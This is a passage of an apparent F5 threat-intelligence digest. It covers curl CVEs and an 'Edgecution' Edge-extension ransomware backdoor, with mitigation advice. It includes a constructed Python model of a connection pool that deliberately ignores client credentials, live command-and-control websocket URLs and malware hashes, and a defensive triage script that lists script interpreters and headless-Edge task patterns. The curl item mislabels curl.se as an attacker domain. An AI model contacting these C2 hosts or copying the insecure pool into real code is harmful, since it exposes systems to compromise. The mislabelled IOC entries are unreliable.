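Constructed for this digest, not libcurl's code. VulnerablePool matches cached
connections by destination only; HardenedPool folds the client cert and key in."""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    host: str
    port: int
    client_cert: str = ""  # client certificate path or PEM (constructed)
    client_key: str = ""   # private key path or PEM (constructed)


def fingerprint(r: Request) -> str:
    """Stable digest of the client credentials attached to a request."""
    raw = f"{r.client_cert}\0{r.client_key}".encode()
    return hashlib.sha256(raw).hexdigest()[:16]


class VulnerablePool:
    """Pre-patch behaviour: the reuse key omits the client cert and key."""

    def __init__(self):
        self._conns = {}  # reuse key -> identity the TLS handshake was done with

    def _key(self, r: Request):
        return (r.host, r.port)

    def connect(self, r: Request) -> str:
        """Return the identity of the connection that will serve r."""
        key = self._key(r)
        if key not in self._conns:  # no cached match: perform a fresh handshake
            self._conns[key] = fingerprint(r)
        return self._conns[key]


class HardenedPool(VulnerablePool):
    """Fixed behaviour: a different cert or key never matches a cached connection."""

    def _key(self, r: Request):
        return (r.host, r.port, fingerprint(r))


def authenticated_as_self(pool: VulnerablePool, r: Request) -> bool:
    """True when the connection serving r was handshaked with r's own credentials."""
    return pool.connect(r) == fingerprint(r)
```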

Severity: Critical

Threat Details and IOCs

CVEs: CVE-2026-10536, CVE-2026-11352, CVE-2026-11564, CVE-2026-11586, CVE-2026-11856, CVE-2026-12064, CVE-2026-8286, CVE-2026-8458, CVE-2026-8924, CVE-2026-8925, CVE-2026-8926, CVE-2026-8927, CVE-2026-8932, CVE-2026-9079, CVE-2026-9080, CVE-2026-9545, CVE-2026-9546, CVE-2026-9547
Technologies: cURL
Attacker Domains: curl[.]se
Attacker URLs: hxxps[://]curl[.]se/docs/CVE-2026-10536.html, hxxps[://]curl[.]se/docs/CVE-2026-11352.html, hxxps[://]curl[.]se/docs/CVE-2026-11564.html, hxxps[://]curl[.]se/docs/CVE-2026-11586.html, hxxps[://]curl[.]se/docs/CVE-2026-11856.html, hxxps[://]curl[.]se/docs/CVE-2026-12064.html, hxxps[://]curl[.]se/docs/CVE-2026-8286.html, hxxps[://]curl[.]se/docs/CVE-2026-8458.html, hxxps[://]curl[.]se/docs/CVE-2026-8924.html, hxxps[://]curl[.]se/docs/CVE-2026-8925.html, hxxps[://]curl[.]se/docs/CVE-2026-8926.html, hxxps[://]curl[.]se/docs/CVE-2026-8927.html, hxxps[://]curl[.]se/docs/CVE-2026-8932.html, hxxps[://]curl[.]se/docs/CVE-2026-9079.html, hxxps[://]curl[.]se/docs/CVE-2026-9080.html, hxxps[://]curl[.]se/docs/CVE-2026-9545.html, hxxps[://]curl[.]se/docs/CVE-2026-9546.html, hxxps[://]curl[.]se/docs/CVE-2026-9547.html
Victim Industries: Aerospace, Automotive, Information Technology, Software, Technology Hardware, Telecommunications

Mitigation Advice

  • Use vulnerability scanners and software inventory tools to identify all assets running vulnerable versions of curl and libcurl.
  • Prioritize and apply the patch to update curl and libcurl to the latest secure version on all affected systems, focusing first on internet-facing and business-critical applications.

Compliance Best Practices

  • Implement a process to generate and maintain a Software Bill of Materials (SBOM) for all critical and in-house developed applications to improve visibility into underlying software components.
  • Implement or mature an automated patch management system for operating systems and common third-party applications to ensure timely deployment of security updates.
  • Review and enhance network segmentation controls to limit lateral movement between systems and services, reducing the potential impact of a compromised application.

Malicious Edge Extension Abuses Native Messaging as Bridge to Malware

A malicious Microsoft Edge extension, dubbed 'Edgecution,' has been observed in ransomware attacks, specifically by an Initial Access Broker associated with the Payouts Kings operation. The extension abuses the Chrome Native Messaging protocol to bypass the browser sandbox and deploy a Python-based backdoor on compromised systems. The attack typically begins with social engineering: threat actors impersonate IT support on Microsoft Teams and direct victims to fraudulent "update" pages. These pages prompt the download of malicious scripts (AutoHotKey, batch, or PowerShell) that configure the environment, extract malware components from a malformed ZIP archive, and establish persistence through scheduled tasks and native messaging manifests. The 'Edgecution' extension, disguised as an 'Edge Monitoring Agent,' runs in a headless browser, communicates with a command-and-control server, and relays instructions to the Python backdoor. The backdoor can execute shell commands, PowerShell, and arbitrary Python code, write files, and gather system information. To counter this evolving threat, organizations should strengthen monitoring of browser extensions and enforce stringent controls over native messaging host configurations. Indicators of Compromise, including C2 servers and malware hashes, have been identified.

Severity: Critical

Threat Details and IOCs

Malware: Edgecution, Edge Monitoring Agent, Payout Kings, Payouts King, PayoutsKing
Technologies: AutoHotkey, Google Chrome, Microsoft 365, Microsoft Outlook, Microsoft Teams, Microsoft Windows, Python
Threat Actors: Payoutsking
Attacker Domains: d1jp293q9tvi92[.]cloudfront[.]net, d23l50n6ubud7p[.]cloudfront[.]net, d2g6dl71gua1qa[.]cloudfront[.]net, d3nh8sl98s2554[.]cloudfront[.]net
Attacker URLs: wss[:]//d1jp293q9tvi92.cloudfront.net/ws, wss[:]//d23l50n6ubud7p.cloudfront.net/ws, wss[:]//d2g6dl71gua1qa.cloudfront.net/ws, wss[:]//d3nh8sl98s2554.cloudfront.net/ws
Attacker Hashes: 3d1158884fb339b3328bd330fcc27598e1f1c94bcac39e75d1a272afa4deee1a, a08d8e63b0cd3638fb40b8e6da546e26da69439597565827f9cec87915f78568
Victim Industries: Business Services, Civil Infrastructure, Education, Engineering, Financial Services, Food & Beverage, Government, Healthcare, Manufacturing, Retail, Transportation
Victim Countries: Brazil, Canada, Germany, Ireland, Italy, Spain, United Kingdom, United States

Mitigation Advice

  • Add the file hashes and command-and-control server domains associated with the Edgecution malware to your EDR, proxy, and firewall blocklists.
  • Create and run a threat hunting query in your SIEM or EDR to search for new scheduled tasks that launch Microsoft Edge, particularly with the '--headless=new' command-line argument.
  • Scan network traffic logs and endpoint file systems for ZIP files with malformed headers, and investigate any associated download events from untrusted websites.
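The hunting advice above can be applied to exported artifacts offline. The Python below is an added example for this digest, not the report's own tooling: it triages native messaging host manifests (the file format Edge and Chrome register for a host, with `name`, `path`, `type` and `allowed_origins` fields) for interpreter-backed or user-writable host binaries and flags scheduled-task actions that launch Edge headless; the manifest, task names and allowlist are constructed.

```python
"""Offline triage of Edge native-messaging host manifests and scheduled tasks.
Added example for this digest, not the report's own tooling. Real manifest paths
are registered under HKCU/HKLM\\Software\\Microsoft\\Edge\\NativeMessagingHosts
and task actions can be exported with `schtasks /query /xml`; data here is constructed."""
import json
import re
from pathlib import PureWindowsPath

# Interpreters that a legitimate native host rarely points at directly.
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "wscript.exe", "cscript.exe", "autohotkey.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
HEADLESS_EDGE = re.compile(r"msedge(?:\.exe)?\b.*--headless", re.IGNORECASE)


def triage_manifest(manifest_json: str, allowed_hosts: set) -> list:
    """Reasons a native-messaging host manifest deserves investigation."""
    m = json.loads(manifest_json)
    name, path = m.get("name", ""), PureWindowsPath(m.get("path", ""))
    findings = []
    if name not in allowed_hosts:
        findings.append(f"host '{name}' is not on the approved allowlist")
    if path.name.lower() in SCRIPT_HOSTS:
        findings.append(f"host binary is a script interpreter: {path.name}")
    if any(seg in str(path).lower() for seg in USER_WRITABLE):
        findings.append("host binary lives in a user-writable location")
    return findings


def headless_edge_tasks(task_actions: dict) -> list:
    """Names of scheduled tasks whose action launches Edge headless."""
    return [name for name, cmd in task_actions.items() if HEADLESS_EDGE.search(cmd)]


# Constructed samples shaped like the persistence described in the report.
SAMPLE_MANIFEST = json.dumps({
    "name": "com.edge.monitoring_agent",
    "path": "C:\\Users\\alice\\AppData\\Local\\EdgeAgent\\pythonw.exe",
    "type": "stdio",
    "allowed_origins": ["chrome-extension://abcdefghijklmnopabcdefghijklmnop/"],
})
SAMPLE_TASKS = {
    "EdgeMonitor": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --headless=new",
    "OneDriveSync": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background",
}
```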

Compliance Best Practices

  • Use Group Policy (GPO) or a Mobile Device Management (MDM) solution to prevent users from installing browser extensions; create and enforce an allowlist of approved extensions required for business functions.
  • Configure Microsoft Edge and Google Chrome browser policies to block all Native Messaging hosts by default, and establish a formal review process to approve and allowlist only legitimate applications.
  • Implement a recurring security awareness training program that specifically educates employees on how to identify and report social engineering attempts on collaboration platforms like Microsoft Teams, and how to verify the legitimacy of IT support requests through a separate, trusted channel.
  • Deploy an application control solution, such as Windows Defender Application Control (WDAC) or AppLocker, to restrict the execution of scripting engines like PowerShell, AutoHotKey, and Python to only authorized users or signed scripts.
  • Tune your EDR and SIEM detection rules to generate high-priority alerts when a browser process (e.g., msedge.exe) spawns command-line interpreters (cmd.exe, powershell.exe) or performs sensitive system discovery actions.

Authors & Contributors

Brian Sayer (Author)

Threat Intelligence Analyst, F5